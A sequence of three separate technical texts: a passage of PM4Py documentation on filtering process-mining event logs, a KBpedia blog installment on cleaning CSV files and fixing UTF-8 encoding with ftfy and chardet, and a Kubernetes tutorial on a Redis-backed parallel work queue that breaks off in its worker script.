The following code could be used on the receipt.xes log to filter the traces contained in the interval between 09 March 2011 and 18 January 2012:
from pm4py.algo.filtering.log.timestamp import timestamp_filter
filtered_log = timestamp_filter.filter_traces_contained(log, "2011-03-09 00:00:00", "2012-01-18 23:59:59")
If we print the size of the log against the one of the filtered log:
print(len(log)) print(len(filtered_log))
We get that while the original log contained 1434 traces, the filtered log contains only 959 traces.
Filtering traces intersecting the timeframe
The following code could be used on the receipt.xes log to filter the traces intersecting the interval between 09 March 2011 and 18 January 2012:
from pm4py.algo.filtering.log.timestamp import timestamp_filter
filtered_log = timestamp_filter.filter_traces_intersecting(log, "2011-03-09 00:00:00", "2012-01-18 23:59:59")
If we print the size of the log against the one of the filtered log, we get that while the original log contained 1434 traces, the filtered log contains only 975 traces.
Filtering events contained in the timeframe
In this case, we want to keep all the events contained in the timeframe, without preserving trace integrity. If we use the following code:
from pm4py.algo.filtering.log.timestamp import timestamp_filter
filtered_log_events = timestamp_filter.apply_events(log, "2011-03-09 00:00:00", "2012-01-18 23:59:59")
We get a log that contains 975 traces (as the filtered log in the previous subsection), but in this case the number of events is smaller. Executing the following code we get the number of events of the previous filtered log and the number of events of the current filtered log:
print(sum([len(trace) for trace in filtered_log])) print(sum([len(trace) for trace in filtered_log_events]))
The number of events is 5756 for the first (so all the events of the trace are kept) and 5688 for the second (so traces have been trimmed).
Filtering on case performance
This filter keeps only the traces in the log whose duration lies inside a specified interval.
The following code applies a filter on case performance keeping only cases with duration between 1 day and 10 days:
from pm4py.algo.filtering.log.cases import case_filter filtered_log = case_filter.filter_on_case_performance(log, 86400, 864000)
On the receipt.xes log, the number of traces satisfying this criteria is 296.
Filtering on start activities
This filter keeps only the traces in the log whose start activity is among a set of specified activities.
To retrieve the list of start activities in the log, the following code could be used:
from pm4py.algo.filtering.log.start_activities import start_activities_filter log_start = start_activities_filter.get_start_activities(log)
In this case, we get the following dictionary reporting the start activities and the number of occurrences:
{'Confirmation of receipt': 1434}
To apply a filter (even if useless in this case) the following code could be used:
filtered_log = start_activities_filter.apply(log, ["Confirmation of receipt"])
It is possible to automatically keep the most frequent start activities, using the apply_auto_filter function. The function accepts a decreasingFactor parameter (equal to 0.6 by default), and how it works is best explained with an example. Suppose we have a log with the following start activities, ordered by number of occurrences:
A with number of occurrences 1000
B with number of occurrences 700
C with number of occurrences 300
D with number of occurrences 50
The most frequent start activity (A with 1000 occurrences) is always kept by the method. Then, the number of occurrences of B is compared with the number of occurrences of A: occ(B)/occ(A) = 0.7. If decreasingFactor=0.6, then B is also kept as an admissible start activity (because occ(B)/occ(A) > 0.6); if decreasingFactor=0.8, then B is not kept as an admissible start activity and the method stops here. Then, if B is accepted, C is considered as well. We have occ(C)/occ(B) = 0.43. If decreasingFactor=0.6, then C is not accepted as an admissible start activity and the method stops here. A small sketch of this selection rule is shown after the list below.
Depending on the value of the decreasing factor, we have the following set of admitted start activities:
decreasingFactor = 0.8 => {A}
decreasingFactor = 0.6 => {A,B}
decreasingFactor = 0.4 => {A,B,C}
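To make the rule concrete, here is a small self-contained sketch of this selection logic applied to the example counts above (plain Python, not the actual PM4Py internals):
def admitted_activities(counts, decreasing_factor=0.6):
    # counts: dict of activity -> number of occurrences
    ordered = sorted(counts.items(), key=lambda kv: kv[1], reverse=True)
    admitted = [ordered[0][0]]                      # the most frequent activity is always kept
    for (act, occ), (_, prev_occ) in zip(ordered[1:], ordered):
        if occ / prev_occ > decreasing_factor:      # compare with the previously admitted one
            admitted.append(act)
        else:
            break                                   # the method stops at the first failure
    return admitted

counts = {"A": 1000, "B": 700, "C": 300, "D": 50}
print(admitted_activities(counts, 0.8))  # ['A']
print(admitted_activities(counts, 0.6))  # ['A', 'B']
print(admitted_activities(counts, 0.4))  # ['A', 'B', 'C']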
To apply a filter (and print the admitted start activities) the following code could be used:
from pm4py.algo.filtering.log.start_activities import start_activities_filter
log_af_sa = start_activities_filter.apply_auto_filter(log, parameters={"decreasingFactor": 0.6})
print(start_activities_filter.get_start_activities(log_af_sa))
We get the following admitted start activities:
{'Confirmation of receipt': 1434}
Filtering on end activities
This filter keeps only the traces in the log whose end activity is among a set of specified activities.
To retrieve the list of end activities in the log, the following code could be used:
from pm4py.algo.filtering.log.end_activities import end_activities_filter
log_end = end_activities_filter.get_end_activities(log)
In this case, we get the following dictionary reporting the end activities and the number of occurrences:
{'T02 Check confirmation of receipt': 8, 'T03 Adjust confirmation of receipt': 2, 'T10 Determine necessity to stop indication': 828, 'T20 Print report Y to stop indication': 15, 'T05 Print and send confirmation of receipt': 400, 'Confirmation of receipt': 116, 'T15 Print document X request unlicensed': 39, 'T11 Create document X request unlicensed': 4, 'T06 Determine necessity of stop advice': 16, 'T04 Determine confirmation of receipt': 2, 'T07-1 Draft intern advice aspect 1': 1, 'T13 Adjust document X request unlicensed': 1, 'T07-5 Draft intern advice aspect 5': 1, 'T07-2 Draft intern advice aspect 2': 1}
To apply a filter the following code could be used:
filtered_log = end_activities_filter.apply(log, ["T05 Print and send confirmation of receipt", "T10 Determine necessity to stop indication"])
In this case, if we print the length of the filtered log, it results that 1228 traces of the original 1434 are kept.
It is possible to automatically filter the log to keep the most frequent end activities through the apply_auto_filter function, which accepts a decreasingFactor parameter (default 0.6; see the start activities filter for an explanation).
The following code filters the log keeping only the most frequent end activities, and prints them:
from pm4py.algo.filtering.log.end_activities import end_activities_filter
log_af_ea = end_activities_filter.apply_auto_filter(log, parameters={"decreasingFactor": 0.6})
print(end_activities_filter.get_end_activities(log_af_ea))
Filtering on variants
A variant is a set of cases that share the same control-flow perspective, so a set of cases that share the same classified events (activities) in the same order.
To get the list of variants contained in a given log, the following code could be used:
from pm4py.algo.filtering.log.variants import variants_filter variants = variants_filter.get_variants(log)
This is expressed as a dictionary having the variant as key and the list of cases that share the variant as value. If the number of occurrences of the variants is of interest, the following code retrieves a list of variants along with their count:
from pm4py.statistics.traces.log import case_statistics
variants_count = case_statistics.get_variant_statistics(log)
variants_count = sorted(variants_count, key=lambda x: x['count'], reverse=True)
print(variants_count)
Obtaining the following output:
[{'variant': 'Confirmation of receipt,T02 Check confirmation of receipt,T04 Determine confirmation of receipt,T05 Print and send confirmation of receipt,T06 Determine necessity of stop advice,T10 Determine necessity to stop indication', 'count': 713}, {'variant': 'Confirmation of receipt,T06 Determine necessity of stop advice,T10 Determine necessity to stop indication,T02 Check confirmation of receipt,T04 Determine confirmation of receipt,T05 Print and send confirmation of receipt', 'count': 123}, {'variant': 'Confirmation of receipt', 'count': 116}, {'variant': 'Confirmation of receipt,T02 Check confirmation of receipt,T06 Determine necessity of stop advice,T10 Determine necessity to stop indication,T04 Determine confirmation of receipt,T05 Print and send confirmation of receipt', 'count': 115}, ...
Suppose you want to filter the log on the most common variant, then the following code could be used:
filtered_log1 = variants_filter.apply(log, ["Confirmation of receipt,T02 Check confirmation of receipt,T04 Determine confirmation of receipt,T05 Print and send confirmation of receipt,T06 Determine necessity of stop advice,T10 Determine necessity to stop indication"])
And the variants of the log could be checked:
variants_count_filtered_log1 = case_statistics.get_variant_statistics(filtered_log1) print(variants_count_filtered_log1)
Obtaining:
[{'variant': 'Confirmation of receipt,T02 Check confirmation of receipt,T04 Determine confirmation of receipt,T05 Print and send confirmation of receipt,T06 Determine necessity of stop advice,T10 Determine necessity to stop indication', 'count': 713}]
Suppose instead you want to filter out (remove) the most common variant. The following code could be used:
filtered_log2 = variants_filter.apply(log, ["Confirmation of receipt,T02 Check confirmation of receipt,T04 Determine confirmation of receipt,T05 Print and send confirmation of receipt,T06 Determine necessity of stop advice,T10 Determine necessity to stop indication"], parameters={"positive": False})
And the variants checked as above, obtaining:
[{'variant': 'Confirmation of receipt,T06 Determine necessity of stop advice,T10 Determine necessity to stop indication,T02 Check confirmation of receipt,T04 Determine confirmation of receipt,T05 Print and send confirmation of receipt', 'count': 123}, {'variant': 'Confirmation of receipt', 'count': 116}, ...
A filter to keep automatically the most common variants could be applied through the apply_auto_filter method. This method accepts a parameter called decreasingFactor (default value is 0.6; further details are provided in the start activities filter).
auto_filtered_log = variants_filter.apply_auto_filter(log)
Filtering on attributes values
Filtering on attribute values permits, alternatively, to:
Keep cases that contain at least one event with one of the given attribute values
Remove cases that contain an event with one of the given attribute values
Keep events (trimming traces) that have one of the given attribute values
Remove events (trimming traces) that have one of the given attribute values
Example of attributes are the resource (generally contained in org:resource attribute) and the activity (generally contained in concept:name attribute).
To get the list of resources and activities contained in the log, the following code could be used:
from pm4py.algo.filtering.log.attributes import attributes_filter
activities = attributes_filter.get_attribute_values(log, "concept:name")
resources = attributes_filter.get_attribute_values(log, "org:resource")
Retrieving this list of resources (on the Receipt log):
{'Resource01': 1228, 'Resource02': 580, 'Resource03': 552, 'Resource04': 483, 'Resource05': 445, 'Resource06': 430, 'Resource07': 424, 'Resource08': 356, 'admin1': 352, 'Resource09': 350, 'Resource10': 329, 'Resource11': 328, 'Resource12': 326, 'Resource13': 307, 'Resource14': 264, 'Resource15': 235, 'Resource16': 215, 'Resource17': 194, 'Resource18': 170, 'admin2': 160, 'Resource19': 136, 'Resource20': 120, 'Resource21': 104, 'Resource22': 80, 'Resource23': 78, 'Resource24': 50, 'Resource25': 49, 'Resource26': 44, 'Resource27': 43, 'Resource28': 30, 'Resource29': 20, 'Resource30': 13, 'Resource31': 12, 'Resource32': 11, 'Resource33': 11, 'Resource34': 10, 'Resource35': 8, 'Resource36': 6, 'Resource37': 5, 'test': 5, 'admin3': 3, 'Resource38': 3, 'TEST': 2, 'Resource39': 2, 'Resource40': 1, 'Resource41': 1, 'Resource43': 1, 'Resource42': 1}
And this list of activities:
{'Confirmation of receipt': 1434, 'T06 Determine necessity of stop advice': 1416, 'T02 Check confirmation of receipt': 1368, 'T04 Determine confirmation of receipt': 1307, 'T05 Print and send confirmation of receipt': 1300, 'T10 Determine necessity to stop indication': 1283, 'T03 Adjust confirmation of receipt': 55, 'T07-1 Draft intern advice aspect 1': 45, 'T11 Create document X request unlicensed': 44, 'T12 Check document X request unlicensed': 41, 'T15 Print document X request unlicensed': 39, 'T14 Determine document X request unlicensed': 39, 'T07-2 Draft intern advice aspect 2': 32, 'T07-5 Draft intern advice aspect 5': 27, 'T17 Check report Y to stop indication': 26, 'T20 Print report Y to stop indication': 20, 'T19 Determine report Y to stop indication': 20, 'T16 Report reasons to hold request': 20, 'T08 Draft and send request for advice': 18, 'T07-3 Draft intern advice hold for aspect 3': 8, 'T09-3 Process or receive external advice from party 3': 8, 'T09-1 Process or receive external advice from party 1': 7, 'T07-4 Draft internal advice to hold for type 4': 6, 'T18 Adjust report Y to stop indicition': 6, 'T09-4 Process or receive external advice from party 4': 5, 'T13 Adjust document X request unlicensed': 2, 'T09-2 Process or receive external advice from party 2': 1}
To filter traces containing/not containing a given list of resources, the following code could be used:
from pm4py.util import constants
tracefilter_log_pos = attributes_filter.apply(log, ["Resource10"], parameters={constants.PARAMETER_CONSTANT_ATTRIBUTE_KEY: "org:resource", "positive": True})
tracefilter_log_neg = attributes_filter.apply(log, ["Resource10"], parameters={constants.PARAMETER_CONSTANT_ATTRIBUTE_KEY: "org:resource", "positive": False})
To filter events (trimming traces) the following code could be used:
eventsfilter_log = attributes_filter.apply_events(log, ["Resource10"], parameters={constants.PARAMETER_CONSTANT_ATTRIBUTE_KEY: "org:resource", "positive": True})
To automatically apply a filter on event attributes (trimming traces and keeping only events whose attribute carries a frequent value), the apply_auto_filter method is provided. The method accepts as parameters the attribute name and the decreasingFactor (default 0.6; an explanation can be found under the start activities filter). Example:
from pm4py.algo.filtering.log.attributes import attributes_filter
from pm4py.util import constants
filtered_log = attributes_filter.apply_auto_filter(log, parameters={constants.PARAMETER_CONSTANT_ATTRIBUTE_KEY: "concept:name", "decreasingFactor": 0.6})
Filter on numeric attribute values
Filtering on numeric attribute values provides options similar to filtering on string attribute values (already considered above). Let's see an example by importing the roadtraffic100traces.xes log file:
import os
from pm4py.objects.log.importer.xes import factory as xes_importer
log = xes_importer.apply(os.path.join("tests", "input_data", "roadtraffic100traces.xes"))
The following filter (on events) helps to keep only the events with an amount between 34 and 36:
from pm4py.algo.filtering.log.attributes import attributes_filter
from pm4py.util import constants
filtered_log_events = attributes_filter.apply_numeric_events(log, 34, 36, parameters={constants.PARAMETER_CONSTANT_ATTRIBUTE_KEY: "amount"})
print(len(filtered_log_events))
Similarly, the following filter on cases helps to keep only the cases with at least one event satisfying the specified amount:
filtered_log_cases = attributes_filter.apply_numeric(log, 34, 36, parameters={constants.PARAMETER_CONSTANT_ATTRIBUTE_KEY: "amount"}) print(len(filtered_log_cases))
The filter on cases provides the option to specify up to two attributes that are checked on the events that shall satisfy the numeric range. For example, if we are interested in cases having an event with activity Add penalty and an amount between 34 and 500, the following code helps:
filtered_log_cases = attributes_filter.apply_numeric(log, 34, 500, parameters={constants.PARAMETER_CONSTANT_ATTRIBUTE_KEY: "amount", "stream_filter_key1": "concept:name", "stream_filter_value1": "Add penalty"})
Filtering on paths
Paths related to an attribute (e.g. the activity, the resource) describe the directly-follows relations according to the given attribute. To obtain a list of paths contained in the log, the following code could be used:
from pm4py.algo.filtering.log.paths import paths_filter
from pm4py.util import constants
paths_activities = paths_filter.get_paths_from_log(log, attribute_key="concept:name")
paths_resources = paths_filter.get_paths_from_log(log, attribute_key="org:resource")
A filtered log containing only traces where at least one of the given paths occurred could be retrieved using the following code:
filtered_pos = paths_filter.apply(log, [("T06 Determine necessity of stop advice", "T02 Check confirmation of receipt")], parameters={constants.PARAMETER_CONSTANT_ATTRIBUTE_KEY: "concept:name", "positive": True})
A filtered log containing only traces where none of the given paths has occurred could be retrieved using the following code:
filtered_neg = paths_filter.apply(log, [("T06 Determine necessity of stop advice", "T02 Check confirmation of receipt")], parameters={constants.PARAMETER_CONSTANT_ATTRIBUTE_KEY: "concept:name", "positive": False})
|
Out of Sequence, But Reducing ‘Garbage’ Always Makes Sense
We have noted in previous installments in this Cooking with Python and KBpedia series how important consistent UTF-8 encoding is to roundtripping with our files. One of the ways we can enforce this importance is to consistently read and write files with UTF-8 specified, as discussed in CWPK #31. But, what if we have obtained external information? How can we ensure it is in the proper encoding or has wrong character assignments fixed? If we are going to perform such checks, what other consistency tests might we want to include? In this installment, we add some pre-build routines to test and clean our files for proper ingest.
As I noted in CWPK #39, cleaning comes before the build steps in the actual build process. But we wanted to have an understanding of broader information flows throughout the build or use scenarios before formulating the cleaning routines. That is both because they are not always operationally applied, and because working out the build steps was aided by not having to carry around extra routines. Now that we have the ingest and build steps fairly well outlined, it is an easier matter to see where and how cleaning steps best fit into this flow.
At the outset, we know we want to work with clean files when building KBpedia. Do we want such checks to run in every build, or optionally? Do we want to run checks against single files or against entire directories or projects? Further, are we not likely to want to add more checks over time as our experience with the build process and problems encountered increase? Lastly, we can see down the road (CWPK #48) to where we also only want to make incremental changes to an existing knowledge graph, as opposed to building one from scratch or de novo. How might that affect cleaning requirements or placement of methods?
Design Considerations
In thinking about these questions, we decided to take this general approach to testing and vetting clean files:
Once vetted, files will remain clean (insofar as the tests run) until next edited. It may not make sense to check all files automatically at the beginning of a build. This point suggests we should have a separate set of cleaning routines from the overall build process. We may later want to include that into an overall complete build routine, but we can do so later as part of a make file approach rather than including cleaning as a mandatory part of all builds.
Once we have assembled our files for a new build, we should assume that all files are unvetted. As build iterations proceed, we only need to vet those files that have been modified. When initially testing a new build, it probably makes sense for us to be able to loop over all of the input files in a given directory (corresponding to most of the subdirectories under
kbpedia > version > build; see the prior CWPK #37 installment). These points suggest we want the option to configure our clean routines for either all files in a subdirectory or a list of files. To keep configuration complexity lower, we will stipulate that if a list of files is used, they should all be in the same subdirectory.
Our biggest cleaning concern is that we have clean, UTF-8 text (encodings) in all of our input files. However, if we need to run this single test, we ought to test for other consistency concerns, as well. Here are the additional tests that look useful in our initial module development:
Have new fields (columns) been added to our CSV files?
Are our input files missing already defined fields?
Are we missing required fields (prefLabel and definition)?
Are our fields properly constructed (CamelCase with initial cap for classes, initial lowercase for properties, and URI encoding for IRIs)?
If we do have encoding issues, and given the manual effort required to fix them, can we include some form of encoding ‘fix’ routine? It turns out there is a Python package for such a routine, which we will test in this installment and include if deemed useful.
These considerations are what have guided the design of the cowpoke clean module. Also, as we noted in CWPK #9, our design is limited to Python 3x. Python 2 has not been accommodated in cowpoke.
A Brief Detour for URIs
KBpedia is a knowledge graph based on semantic technologies and which incorporates seven major public and online knowledge bases: Wikipedia, Wikidata, DBpedia, schema.org, GeoNames, UNSPSC, and OpenCyc. A common aspect of all of these sources is that reference to information is a Web string that ‘identifies’ the item at hand that, when clicked, also takes us to the source of that item. In the early days of the Web this identifier mostly pertained to Web pages and was known as a Universal Resource Locator, or URL. They were the underlined blue links of the Web’s early days.
But, there are other protocols for discovering resources on the Internet beside the Web protocols of HTTP and HTTPS. There is Gopher, FTP, email, and others. Also, as information began to proliferate from Web pages to data items within databases and these other sources, the idea of a ‘locator’ was generalized to include ‘identifiers’ when it is a data item and not a page. This generalization is known as a URI, or if a ‘name’ within other schema or protocols, known as a URN. Here, for example, is the URI address of the English Wikipedia main page:
https://en.wikipedia.org/wiki/Main_Page
Note that white space is not allowed in this string, and is replaced with underscores in this example.
The allowed characters that could be used in constructing one of these addresses were limited to mostly ASCII characters, with some characters like the forward-slash (‘/’) forbidden because they are a defined constructor of an address. If one wanted to include non-allowed characters in a URI address, it needed to be percent encoded. Here, for example, is the English Wikipedia address for its article on the Côte d’Azur Observatory:
https://en.wikipedia.org/wiki/C%C3%B4te_d%27Azur_Observatory
This format is clearly hard to read. Most Web browsers, for example, decode these strings when you look at the address within the browser, so it appears as this:
https://en.wikipedia.org/wiki/Côte_d'Azur_Observatory
And, in fact, if you submit the string as exactly shown above, encoders at Wikipedia would accept this input string.
The Internationalized Resource Identifier (IRI) was proposed and then adopted on the Web as a way of bringing in a wider range of acceptable characters useful to international languages. Mostly what we see in browsers today is the IRI version of these addresses, even if not initially formulated as such.
Sources like Wikipedia and Wikidata restrict their addresses to URIs. A source like DBpedia, on the other hand, supports IRIs. Wikipedia also has a discussion on how to fix these links.
The challenge in these different address formats is that if encoding gets screwed up, IRI versions of addresses can also get screwed up. That might be marginally acceptable when we are encoding something like a definition or comment (an annotation), but absolutely breaks the data record if it occurs to that record’s identifying address: Any change or alteration of the exact characters in the address means we can no longer access that data item.
Non-percent encoded Wikipedia addresses and DBpedia addresses are two problem areas. We also have tried to limit KBpedia’s identifiers to the ASCII version of these international characters. For example, the KBpedia item for Côte-d’Or shows as the address:
http://kbpedia.org/kko/rc/CoteDOr
We still have a readable label, but one with encoding traps removed.
I provide this detour to highlight that we also need to give special attention in our clean module to how Web addresses are coming in to the system and being treated. We obviously want to maintain the original addresses as supplied by the respective external sources. We also want to test and make sure these have not been improperly encoded. And we also want to test that our canonical subset of characters used in KBpedia is being uniformly applied to our own internal addresses.
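As a small illustration of the kinds of checks involved (a sketch only; the ascii_fold helper name is made up here and is not the actual cowpoke routine), Python's standard library already covers percent-encoding round trips and folding accented characters to ASCII:
from urllib.parse import quote, unquote
import unicodedata

iri = "https://en.wikipedia.org/wiki/Côte_d'Azur_Observatory"

# Round-trip check: percent-encode the non-ASCII characters, then decode back.
encoded = quote(iri, safe=":/")            # -> ...C%C3%B4te_d%27Azur_Observatory
assert unquote(encoded) == iri

# Fold accented (diacritic) characters to ASCII before building internal identifiers.
def ascii_fold(s):
    return unicodedata.normalize('NFKD', s).encode('ascii', 'ignore').decode('ascii')

print(ascii_fold("Côte-d'Or"))             # Cote-d'Or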
Encoding Issues and ftfy
Despite it being design point #4 above, let’s first tackle the question of whether encoding fixes may be employed. I move it up the list because it is also the best way to illustrate why encoding issues are at the top of our concerns. First, let’s look at 20 selected records from KBpedia annotations that contain a diversity of language and symbol encodings.
These three files are part of the cowpoke distribution. This first file is the starting set of 20 selected records (remember Run or shift+enter to run the cell):
with open(r'C:\1-PythonProjects\kbpedia\v300\builds\working\annotations_orig.csv', 'r', encoding='utf8') as f:
    print(f.read())
However, here is that same file when directly imported into Excel and then saved (notice we had to change the encoding to get the file to load in Python):
with open(r'C:\1-PythonProjects\kbpedia\v300\builds\working\annotations_excel.csv', 'r', encoding='cp1252') as f:
    print(f.read())
Wow, did that file ever get screwed up! (You will obviously need to change the file locations to match your local configuration.) In fact, there are ways to open CSV files properly in Excel by first firing up the application and then using the File → Open dialogs, but the form above occurs in English MS Excel when you open the file directly, make a couple of changes, and then save. If you do not have a backup, you would be in a world of hurt.
So, how might we fix this file, or can we? The first thing to attempt is to load the file with the Python encoding set to UTF-8. Indeed, in many cases, that is sufficient to restore the proper character displays. One thing that is impressive in the migration to Python 3.6 and later is tremendously more forgiving behavior around UTF-8. That is apparently because of the uniform application now of UTF-8 across Python, plus encoding tests that occur earlier when opening files than occurred with prior versions of Python.
But in instances where this does not work, the next alternative is to use ftfy (fixes text for you). The first thing we need to do is to import the module, which is already part of our conda distribution (see CWPK #9):
import ftfy
Then, we can apply ftfy methods (of which there are many useful ones!) to see if we can resurrect that encoding-corrupted file from Excel:
import io
with io.open(r'C:\1-PythonProjects\kbpedia\v300\builds\working\annotations_excel.csv', encoding='utf-8', mode='r', errors='ignore',) as f:
    lines = f.readlines()
print(lines)
fixed_lines = [ftfy.fix_text(line) for line in lines]
print(fixed_lines)
# so you may inspect the results, but we will also write it to file:
with io.open(r'C:\1-PythonProjects\kbpedia\v300\builds\working\annotations_fixed.csv', encoding='utf-8', mode='w',) as out:
    print(fixed_lines, file=out)
I have to say this is pretty darn impressive! We have recovered nearly all of the original formats. Now, it is the case there are some stoppers in the file, which is why we needed to incorporate the more flexible io method of opening the file to be able to ignore the errors. Each of the glitches that occur in the file still need to be manually fixed. But we can also pass 'replace' as a different value for the 'errors' argument to insert a known replacement character and more quickly find these glitches. Overall, this is a much reduced level of effort to fix the file than without ftfy. We have moved from a potentially catastrophic situation to one that is an irritant to fix. That is progress!
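For example (a sketch, assuming the same file paths as above), opening with errors='replace' marks every undecodable byte with the Unicode replacement character, which makes the remaining glitches easy to search for:
import io

with io.open(r'C:\1-PythonProjects\kbpedia\v300\builds\working\annotations_excel.csv',
             encoding='utf-8', mode='r', errors='replace') as f:
    for num, line in enumerate(f, start=1):
        if '\ufffd' in line:               # U+FFFD is the replacement character
            print(num, line.strip())       # lines that still need manual fixing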
Just to confirm (and for which one could do file compares to see specific differences to also help in the manual corrections), here is our now ‘fixed’ output file:
with open(r'C:\1-PythonProjects\kbpedia\v300\builds\working\annotations_fixed.csv', 'r', encoding='utf-8') as f:
    print(f.read())
We can also inspect our files as to what encoding we think it has. Again, we use an added package, chardet in this case, to test any suspect file. Here is the general form:
import chardet
with open(r'C:\1-PythonProjects\kbpedia\v300\builds\working\annotations_fixed.csv', 'rb') as rawdata:
    result = chardet.detect(rawdata.read(10000))
# check what the character encoding might be
print(result)
{'encoding': 'utf-8', 'confidence': 0.99, 'language': ''}
Note that one of the arguments is to pass the first 10,000 characters to the method as the basis for estimating the encoding type. Since the routine is quick, there is really no reason to lower this amount, and higher does not seem to provide any better statistics.
Again, a gratifying aspect of the improvements to Python since version 3.6 or so has been a more uniform approach to UTF-8. We also see we have some tools at our disposal, namely ftfy, that can help us dig out of holes that prior encoding mistakes may have dug. In our early years when encoding mismatches were more frequent, we also developed a Clojure routine for fixing bad characters (or at least converting them to a more readable form). It is likely this routine is no longer needed with Python’s improved handling of UTF-8. However, if this is a problem for your own input files, you can import the unicodedata module for the Python standard library to convert accented (diacritic) characters to ones based on ASCII. Here is the basic form of that procedure:
import unicodedata
def remove_diacrits(input_str):
    input_str = unicodedata.normalize('NFD', input_str).encode('ascii', 'ignore')\
        .decode('utf-8')
    return str(input_str)
s = remove_diacrits("Protégé")
print(s)
Protege
You can embed that routine in a CSV read that also deals with entire rows at a time, similar to some of the other procedures noted here.
However, the best advice, as we have reiterated, is to make sure that files are written and opened in UTF-8. But, it is good to know if we encounter encoding issues in the wild, that both Python and some of its great packages stand ready to help rectify matters (or at least partially so, with less pain). We have also seen how encoding problems can often be a source of garbage input data.
Flat File Checks
Though Python routines could be written for the next points below, they may be easier to deal with directly in a spreadsheet. This is OK, since we are also at that point in our roundtripping where we are dealing directly with CSV files anyway.
To work directly with the sheet, highlight the file’s entire set of rows and columns that are intended for eventual ingest during a build. Give that block a logical name in the upper-left text box entry directly above the sheet, such as ‘Match’ or ‘Big’. You can continue to invoke that block name to re-highlight your subject block. From there, you can readily sort on the specific input column of interest in order to inspect the entire row of values.
Here is my checklist for such flat file inspection:
Does any item in the ‘id’ column lack a URI fragment identifier? If so, provide one using the class and property URI naming conventions in KBpedia (CamelCase in both instances, upper initial case for classes, lower initial case for properties, with only alphanumerics and underscore as allowable characters). Before adding a new ‘id’, make sure it is initially specified in one of the class or property
struct input files
Does any item in the ‘prefLabel’ column lack a preferred label? If so, add one; this field is mandatory
Does any item in the ‘definition’ column lack an entry? If so, add one. Though this field is not mandatory, it is highly encouraged
Check a few rows. Does any column entry have leading or trailing white spaces? If so, use the spreadsheet TRIM function
Check a few rows. Do any of the files with a ‘definition’ column show its full text spread over more than one cell? If so, you have an upstream CSV processing issue that is splitting entries at the common or some other character that should be escaped. The best fix, if intermediate processing has not occurred, is to re-extract the file with correct CSV settings. If not, you may need to concatenate multiple cells in a row in order to re-construct the full string
Check entries for wrong or misspecified namespaces or prefixes. Make sure fragments end with the appropriate characters (‘#’ or ‘/’ if used in a URI construction)
Check columns where multiple entries may reside using the double-pipe (‘||’) convention, and ensure these decomposable strings are being constructed properly.
One of the reasons I am resistant to a complete build routine cascading through all of these steps at once is that problems in intermediate processing files propagate through all subsequent steps. That not only screws up much stuff, but it is harder to trace where the problem first arose. This is an instance where I prefer a ‘semi-automatic’ approach, with editorial inspection required between essential build steps.
Other Cleaning Routines
Fortunately, in our case, we are extracting fairly simple CSV files (though often with some long text entries for definitions) and ingesting in basically the same format. As long as we are attentive to how we modify the intermediate flat files, there is not too much further room for error.
However, there are many sources of external data that may eventually warrant incorporation in some manner into your knowledge graph. These external sources may pose a larger set of cleaning and wrangling challenges. Date and time formats, for example, can be particularly challenging.
Hadley Wickham, the noted R programmer and developer of many fine graphics programs, wrote a paper, Tidy Data, that is an excellent starting primer on wrangling flat files. In the case of our KBpedia knowledge graph and its supporting CSV, about the only guideline that he proposes that we consciously violate is to combine many-to-one data items sometimes in a single column (notably for altLabels, but a few others as well). According to Wickham, we should put each individual value on its own row. I have not done so to keep the listings more compact and the row count manageable. Nonetheless, his general guidance is excellent. Another useful guide is Wrangling Messy CSV Files by Detecting Row and Type Patterns.
There are also many additional packages in Python that may assist in dealing with ‘dirty’ input files. Depending on the specific problems you may encounter, some quick Web searches should turn up some useful avenues to pursue.
Lastly, in both our utils.py and other modules going forward, we will have occasion to develop some bespoke cleaning and formatting routines as our particular topic warrants.
Additional Documentation
Here is some additional documentation related to today's CWPK installment:
|
Fine Parallel Processing Using a Work Queue
In this example, we will run a Kubernetes Job whose Pods run multiple parallel worker processes.
In this example, as each pod is created, it picks up one unit of work from a task queue, processes it, and repeats until the end of the queue is reached.
Here is an overview of the steps in this example:
Start a storage service to hold the work queue. In this example, we use Redis to store our work items. In the previous example, we used RabbitMQ. In this example, we use Redis and a custom work-queue client library, because AMQP does not provide a good way for clients to detect when a finite-length work queue is empty. In practice you would set up a store such as Redis once and reuse it for the work queues of many jobs and other things.
Create a queue, and fill it with messages. Each message represents one task to be done. In this example, a message is just an integer that we will do a lengthy computation on.
Start a Job that works on tasks from the queue. The Job starts several pods. Each pod takes one task from the message queue, processes it, and repeats until the end of the queue is reached.
Before you begin
You need to have a Kubernetes cluster, and the kubectl command-line tool must be configured to communicate with your cluster. If you do not already have a cluster, you can create one by using Minikube, or you can use one of these Kubernetes playgrounds:
To check the version, enter kubectl version.
Starting Redis
For this example, for simplicity, we will start a single instance of Redis. See the Redis example for how to deploy a scalable, highly available Redis.
If you are working from the source tree of this documentation, you can change to the following directory and start a temporary Pod running Redis and a temporary service so that we can find this Pod:
$ cd content/en/examples/application/job/redis
$ kubectl create -f ./redis-pod.yaml
pod/redis-master created
$ kubectl create -f ./redis-service.yaml
service/redis created
If you are not working from the source tree of this documentation, you can download the following files directly:
Filling the queue with tasks
Now let's add some "tasks" to the queue. In this example, our tasks are just strings to be printed.
Start a temporary interactive pod for running the Redis CLI.
$ kubectl run -i --tty temp --image redis --command "/bin/sh"
Waiting for pod default/redis2-c7h78 to be running, status is Pending, pod ready: false
Hit enter for command prompt
Now hit enter, start the Redis CLI, and create a list with a few work items in it.
# redis-cli -h redis
redis:6379> rpush job2 "apple"
(integer) 1
redis:6379> rpush job2 "banana"
(integer) 2
redis:6379> rpush job2 "cherry"
(integer) 3
redis:6379> rpush job2 "date"
(integer) 4
redis:6379> rpush job2 "fig"
(integer) 5
redis:6379> rpush job2 "grape"
(integer) 6
redis:6379> rpush job2 "lemon"
(integer) 7
redis:6379> rpush job2 "melon"
(integer) 8
redis:6379> rpush job2 "orange"
(integer) 9
redis:6379> lrange job2 0 -1
1) "apple"
2) "banana"
3) "cherry"
4) "date"
5) "fig"
6) "grape"
7) "lemon"
8) "melon"
9) "orange"
So, the list with key job2 will be our work queue.
Note: if you do not have Kube DNS set up correctly, you may need to change the first step above to redis-cli -h $REDIS_SERVICE_HOST.
Creating an image
Now we are ready to create an image that we will run.
We will use a Python worker program with a Redis client to read the messages from the message queue.
A simple Redis work queue client library is provided, called rediswq.py (download).
The "worker program" in each Pod of the Job uses the work queue client library to get work. It looks like this:
application/job/redis/worker.py
#!/usr/bin/env python

import time
import rediswq

host="redis"
# Uncomment next two lines if you do not have Kube-DNS working.
# import os
# host = os.getenv("REDIS_SERVICE_HOST")

q = rediswq.RedisWQ(name="job2", host="redis")
print("Worker with sessionID: " + q.sessionID())
